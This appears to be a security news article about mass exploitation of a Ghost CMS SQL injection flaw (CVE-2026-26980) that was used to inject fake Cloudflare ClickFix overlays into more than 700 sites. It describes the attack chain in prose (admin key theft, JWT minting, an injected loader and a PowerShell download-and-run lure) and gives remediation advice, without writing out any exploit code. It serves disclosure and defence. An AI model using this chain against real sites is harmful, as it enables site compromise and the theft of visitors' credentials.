Light bulb Limited Spots Available: Secure Your Lifetime Subscription on Gumroad!

May 26, 2026 · 7 min read

Attackers Chained a 9.4 Severity Ghost CMS SQL Injection Bug to Seed ClickFix Malware on More Than 700 Unpatched Sites—Including Harvard University, Oxford University, Auburn University, and DuckDuckGo, Each Briefly Serving a Fake Cloudflare Prompt That Ran a Shell Command on Visiting Windows Machines

XLab researchers at Qianxin disclosed on May 25, 2026 that CVE-2026-26980, an SQL injection bug in Ghost CMS's Content API, was being exploited at scale to inject JavaScript into article bodies on more than 700 unpatched sites. The injected script renders a fake Cloudflare verification overlay that instructs Windows visitors to paste a command into the Run dialog. The patch shipped in Ghost 6.19.1 on February 19, 2026. Hundreds of sites had not applied it three months later.

An editorial photograph of a developer's monitor showing terminal windows and a dimly lit keyboard, with subtle indigo light highlighting the workspace representing the silent compromise of unpatched content management systems

Key Takeaways

  • CVE-2026-26980 is a CVSS 9.4 SQL injection vulnerability in Ghost CMS versions 3.24.0 through 6.19.0, residing in the slug filter ordering code path of the Content API's input serializer.
  • XLab's threat intelligence team at Qianxin disclosed mass exploitation on May 25, 2026, confirming impact on more than 700 unpatched Ghost installations.
  • Confirmed compromised sites include Harvard University, Oxford University, Auburn University, and DuckDuckGo, alongside fintech, AI, and media operators running Ghost without the patch.
  • The attack chain steals admin API keys via SQL injection, uses them to insert JavaScript into article bodies, and serves a fake Cloudflare human verification overlay that runs a malicious command in the Windows Run dialog. Payloads observed include UtilifySetup.exe (an Electron based stealer), DLL loaders, and JavaScript droppers.
  • Patch released February 19, 2026 in Ghost 6.19.1. Mitigation is to upgrade. The patch replaces flawed SQL string interpolation with parameterized queries.

What Is CVE-2026-26980?

Ghost is a Node.js based open source content management system used by publications, personal blogs, and SaaS marketing sites. Its Content API exposes a slug filter that lets callers fetch posts in a specific order. The implementation that shipped in Ghost 3.24.0 and survived through 6.19.0 took the slug values supplied in the request and embedded them directly into a SQL CASE expression using string concatenation. The values were not parameterized. They were not escaped. The Content API endpoint is unauthenticated for read traffic.

The resulting bug is a textbook SQL injection. A request crafted with a malicious slug value drops into the WHERE clause and executes arbitrary SQL with the privileges of the Ghost database user. That user has full read and write access to the entire Ghost database, which on a standard install includes the encrypted admin API key, every post and page, every user account, the settings table, and the content API key table.

The vulnerability scored 9.4 under CVSS 3.1 because the access vector is network, complexity is low, no authentication is required, and the impact spans confidentiality, integrity, and availability. A patch was issued on February 19, 2026 as Ghost 6.19.1. The patch replaces the string interpolation with a parameterized query that binds slug values as parameters and rejects malicious payloads.

How Did the ClickFix Chain Reach Article Bodies?

Compromising a Ghost site with this bug is a three step process. Step one is the SQL injection, which extracts the site's admin API key. The admin API key is stored in the database as a JWT signing secret. Step two is using that key to mint an admin JWT that lets the attacker call Ghost's admin API as an authenticated administrator. Step three is using that admin authority to edit existing posts or create new ones, planting JavaScript that the Ghost theme will render to every visitor.

The injected JavaScript is a small loader. It fetches a second stage from attacker controlled infrastructure that performs visitor fingerprinting—user agent, screen resolution, browser language, time zone, IP reputation. Visitors who do not match the targeting profile see nothing. Visitors who do—Windows on a common consumer browser, English language, not in a known security researcher IP range—see a fake Cloudflare verification overlay loaded into an iframe.

The overlay tells the visitor to verify they are human by opening the Windows Run dialog (Win key plus R) and pasting a command the page has placed in the clipboard. The command is a PowerShell invocation that downloads and executes the next stage payload. XLab observed at least three distinct end stage payloads, including an Electron based stealer named UtilifySetup.exe, conventional DLL loaders, and JavaScript droppers. The whole flow is a standard ClickFix chain. The novelty is the delivery channel—700 trusted sites hosting the iframe.

Why Did Harvard and DuckDuckGo Run Vulnerable Ghost?

Both Harvard and DuckDuckGo used Ghost installations for content publishing—blogs, research updates, marketing posts—rather than for primary site infrastructure. Ghost is widely used for exactly this role. It is lightweight, easy to operate, has a clean editorial experience, and integrates cleanly with static front ends. None of those properties prevent the CVE-2026-26980 issue from compromising the install.

Both organizations have patched their installs and removed the malicious posts since disclosure. DuckDuckGo's blog displayed the fake Cloudflare overlay for a window of approximately several days before remediation. Harvard's affected pages were research center blogs hosted on the Harvard domain. Auburn and Oxford fell into the same operational pattern—a Ghost install spun up by a department or initiative inside a larger organization, where the central security team was not in the patch pipeline for that specific install.

The lesson for developers and security teams is the lesson that ClickFix attacks have been teaching for two years. CMS supply chain compromises produce malicious payloads served from trusted origins. The same origin protections that defend modern browsers do not help when the trust label belongs to the legitimate publisher. The compromise also bypasses corporate filtering policies that allow access to *.harvard.edu, *.ox.ac.uk, and duckduckgo.com.

What Does the ClickFix Lure Look Like in Practice?

A user lands on a Ghost post they intended to read. The page renders normally for a moment, then an overlay covers the article. The overlay carries Cloudflare's logo and color scheme. The text says something like "verify you are human" or "your IP is showing unusual activity". The instructions are: press Windows key + R, then Ctrl + V, then Enter.

A small number of users do exactly that. The clipboard contains a PowerShell command that downloads and executes a stealer. The user sees the article reload and assumes the verification succeeded. The stealer has begun harvesting browser cookies, saved passwords, browser autofill data, cryptocurrency wallet files, and stored authentication tokens for cloud services. It will exfiltrate them to the attacker's command and control infrastructure within minutes.

For developers and engineers reading this, the relevant pattern is that this chain works on Windows machines belonging to people who are technical enough to follow keyboard shortcuts but not paranoid enough to recognize that no legitimate verification system asks the user to paste a PowerShell command into Run. Browser warning UI does not catch it. Antivirus often does not catch it before exfiltration. The compromise is over before the user notices anything.

What Should Ghost Operators and Visitors Do?

For Ghost operators:

  • Upgrade to Ghost 6.19.1 or later immediately. If you cannot upgrade, take the site offline until you can.
  • Rotate every admin API key and content API key. Assume both have been exposed.
  • Audit every post for unexpected JavaScript embeds. The malicious script is small and easy to spot if you grep for fetch() calls or eval().
  • Reset the database password if the database is reachable from anywhere outside the host machine.
  • Review web server access logs for slug filter requests with suspicious payloads. The pattern is recognizable.

For visitors who encountered a fake Cloudflare overlay, disconnect from the network, run a credible endpoint scan, change every password reachable through the affected browser (start with email and banking), and revoke active sessions on Microsoft, Google, and any cloud provider you use. The stealer payloads observed in this campaign exfiltrate fast enough that "I think I was just hit" is too late for the credentials, but it is not too late to reset before lateral movement.

For the broader pattern, this campaign reads as a textbook example of the same chain we covered in the ClickFix Windows Terminal Lumma Stealer story. The CMS bug changes. The Cloudflare overlay does not. The mitigation is to drill into your users that no real verification system ever asks for a paste into Run.

Stop Email Tracking in Gmail

Spy pixels track when you open emails, where you are, and what device you use. Gblock blocks them automatically.

Try Gblock Free for 30 Days

No credit card required. Works with Chrome, Edge, Brave, and Arc.